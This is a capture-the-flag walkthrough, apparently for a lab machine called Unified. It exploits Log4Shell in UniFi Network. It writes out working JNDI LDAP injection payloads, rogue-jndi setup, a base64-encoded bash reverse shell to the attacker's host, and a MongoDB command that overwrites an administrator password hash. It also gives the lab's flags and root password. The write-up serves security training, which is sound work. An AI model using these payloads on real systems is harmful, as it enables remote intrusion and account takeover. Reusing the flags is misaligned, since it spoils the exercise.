Unified

This writeup explores the effects of exploiting Log4J in a very well known network appliance monitoring system called "UniFi". This box will show you how to set up and install the necessary packages and tools to exploit UniFi by abusing the Log4J vulnerability and manipulate a POST header called remember , giving you a reverse shell on the machine. You'll also change the administrator's password by altering the hash saved in the MongoDB instance that is running on the system, which will allow access to the administration panel and leads to the disclosure of the administrator's SSH password.

4MB

Unified_Write_Up.pdf

pdf

TARGET IP --> 10.129.94.83

Task 1: Which are the first four open ports?

• Start with an NMAP scan of the target IP.

nmap [Target IP]

• Looks like 4 typical ports are open from the scan.

• Ports Open:

  • 22 --> SSH

  • 6789 --> ibm-db2-admin

  • 8080 --> http-proxy

  • 8443 -->https-alt (ssl/nagios-nsca Nagios NSCA)

Task 2: What is the title of the software that is running on port 8443?

• Run a script scan of port 8443.

nmap -sV -sC -p 2443 [Target IP] 

• The software title can be seen under the title "http-title" : UniFi Network

Task 3: What is the version of the software that is running?

• Since the version number does not pop up in our nmap scan, let's visit the webpage URL. The key here is that the service is secured through TLS so it will be https not http.

https://[Target IP]:8443

• Under the UniFi Logo is shows a version number of 6.4.54.

Task 4: What is the CVE for the identified vulnerability?

• Doing a quick google search for vulnerabilities for this software and version led to this page for CVE-2021-44228.

NVD - CVE-2021-44228

Task 5: What protocol does JNDI leverage in the injection?

• I opened up burpsuite and turned on foxyproxy to catch packets. I put in test:test for credentials and captured a packet with burpsuite.

• I had to reload the page as the packets were not originally being caught.

• I then Right-Clicked on the packet and sent it to the Burpsuite Repeater.

• Based on the documentation for the vulnerability, I will place the payload in the remember parameter.

• The payload should be placed in "" to ensure it is referred to as a string. Here is the payload with the HOST IP.

${jndi:ldap://{HOST IP Address}/whatever}

• You'll notice that the payload includes an interface called JDNI and utilizes the protocol LDAP to communicate.

Task 6: What tool do we use to intercept the traffic, indicating the attack was successful?

• Once I hit enter it kicked back that it was unsuccessful but it was actually successful. I can confirm this by using the tool tcpdump.

Task 7: What port do we need to inspect intercepted traffic for?

• tcpdump uses port 389 to intercept traffic on.

• We can confirm that the server is trying to connect back to the host machine by collecting the traffic it is sending back on Port 389 with LDAP.

• First start up a new terminal window and use the following:

sudo tcpdump -i tun0 port 389

• tcpdump is essentially wireshark on a CLI.

• After you have started the dump from above click on the Send button for your Burpsuite Repeater and you should recieve a response back on tcpdump similar to the following.

• This tells me that the server is trying to make a connection back over port 389.

Task 8: What port is the MongoDB service running on?

• We will first need to build a java payload. To do this, I need to first install openjdk, which is used to build java applications.

sudo apt install openjdk-11-jre -y

• You can confirm that java has been installed by running the following.

java -version

• Next is to install Maven which is an IDE for Java.

sudo apt install maven -y

• To confirm you have installed it we can run the following:

mvn -v

• After this we need to download and install the java application Rogue-JDNI.

git clone https://github.com/veracode-research/rogue-jndi

• Change directory into the downloaded folder.

cd rogue-jndi

• Next is to use maven to compile the code from Rogue-JDNI into a distributable format. This will create a .jar file in the target directory.

mvn package

• The payload we will use a pretty basic one for bash.

bash -c "bash -i >& /dev/tcp/[HOST IP]/4444 0>&1"

• We will then need to base64 encode it to avoid any issues when uploading it.

echo bash -c "bash -i >&/dev/tcp/[HOST IP]/4444 0>&1" | base64

• Base64 Encoded Payload --> YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMjA3LzQ0NDQgMD4mMQo=

• Make sure you have started up a netcat listener on a separate terminal window.

nc -lvnp 4444

• Now we need to feed the base64 encrypted payload into the rogue-jdni application

java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,BASE64 STRING HERE}|{base64,-d}|{bash,-i}" --hostname "[HOST IP ADDRESS]"

• This will feed the payload into the application using the --command

• Next is to go back to the intercepted packet on the Burpsuite Reciever and change the remember parameter to the following:

${jndi:ldap://[HOST IP]:1389/o=tomcat}

• On the rogue JNDI application that is listening on port 1389, you'll notice a new entry that tells us we have received a connection back to our host machine.

• I should now have a reverse shell connection to the target if I go back to my netcat listener.

• Now that I have access I can check what procceses are currently running to see if I can determine which port mongod DB is running on.

ps aux

• It looks like mongod is running as PID 67 and is located in bin/mongod

• I tried running netstat to see what port it is running on but it looks like the command is not found.

• Instead I decided to grep mongod out of the previous ps output

ps aux | grep mongod

• Mongod is running on port 27117

Task 9: What is the default database name for UniFi applications?

• Running a quick google search to see what the default name is for database for UniFi applications results in "ace"

Task 10: What is the function we use to enumerate users within the database in MongoDB?

• On the target machine that you have a reverse shell connection to run the following to access the mongod database and search for possible credentials within the database.

mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"

• mongo --> is the command to access a mongod database

• --port --> specifies the port the process is running on. In this case mongod typically runs on port 27117.

• ace --> Is the typical default database name for mongod.

• --eval [SCRIPT] -> Runs a json script to located possible admin credentials.

• This gave me a lot of different user credentials but it appears that all the passwords are in the shadows directory and are hashed.

• administrator@unified.htb

  • $6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.

  • ObjectId --> 61ce278f46e0fb0012d47ee4

• michael@unified.htb

  • $6$spHwHYVF$mF/VQrMNGSau0IP7LjqQMfF5VjZBph6VUf4clW3SULqBjDNQwW.BlIqsafYbLWmKRhfWTiZLjhSP.D/M1h5yJ0

• seamus@unified.htb

  • $6$NT.hcX..$aFei35dMy7Ddn.O.UFybjrAaRR5UfzzChhIeCs0lp1mmXhVHol6feKv4hj8LaGe0dTiyvq1tmA.j9.kfDP.xC.

• warren@unified.htb

  • $6$DDOzp/8g$VXE2i.FgQSRJvTu.8G4jtxhJ8gm22FuCoQbAhhyLFCMcwX95ybr4dCJR/Otas100PZA9fHWgTpWYzth5KcaCZ.

• james@unified.htb

  • $6$ON/tM.23$cp3j11TkOCDVdy/DzOtpEbRC5mqbi1PPUM6N4ao3Bog8rO.ZGqn6Xysm3v0bKtyclltYmYvbXLhNybGyjvAey1

• Here are the credentials for other users as well:

• I won't be able to crack any of these hashes but can instead make new passwords to be utilized for the administrator account.

• I can figure out that the hash is SHA512 if I search online and also due to the $6$ at the beginning.

• I'll create a new password for the admin account. Open a new terminal window on your host machine and run the following to create a SHA512 hash of the password: Password1234

mkpasswd -m sha-512 Password1234

• This will output the following hash. This hash will not take into account salting but since we will upload it in place of the current password for the admin account, we won't need to worry about that.

$6$5e8PzvB0g7cXSVDQ$BKfQ4vD6u.QkLuGPUiKkiAJAtP0hfDXFIPra60/Ttb1d.YeY/U9qSbwisLFu2dO4RznDm29Wn5.67wy4b5rIV.

• Next is to run the following on the target machine to replace the administrator's password with the new one we just generated.

mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("[OBJECT ID FOR ADMIN]")},{$set:{"x_shadow":"[SHA512 GENERATED HASH OF PASSWORD]"}})'

• Here is the output i used:

mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$5e8PzvB0g7cXSVDQ$BKfQ4vD6u.QkLuGPUiKkiAJAtP0hfDXFIPra60/Ttb1d.YeY/U9qSbwisLFu2dO4RznDm29Wn5.67wy4b5rIV."}})'

• This should have now replaced the administrator's hashed password with ours.

• We can verify it worked by running the previous command to view the credentials:

mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"

• Now that we have changed the password, we should be able to login to the admin account through the web portal with the password: Password1234

• 
• Back to the original task: The function we use to enumerate users is:

db.admin.find()

• We used this further above to view all of the users and their credentials.

Task 11: What is the function we use to update users within the database in MongoDB?

• We used this in the previous task to update the administrator's password.

db.admin.update()

Task 12: What is the password for the root user?

• On the UniFi admin page, go to the Settings tab on the left and click on Site.

• Scroll to the bottom where Device Authentification is.

• You'll find that SSH is enabled with the following credentials:

• root:NotACrackablePassword4U2022

Capture User Flag:

• Now that we have root credentials, let's SSH into the target computer using them.

SSH root@[TAGET IP]

• cat the user file located in Michael's directory. This can be done without root priveleges.

cat /home/michael/user.txt

• 6ced1a6a89e666c0620cdb10262ba127

Capture Root Flag:

• cat the root.txt file located in the root directory.

cat /root/root.txt

• e50bc93c75b634e4b272d2f771c33681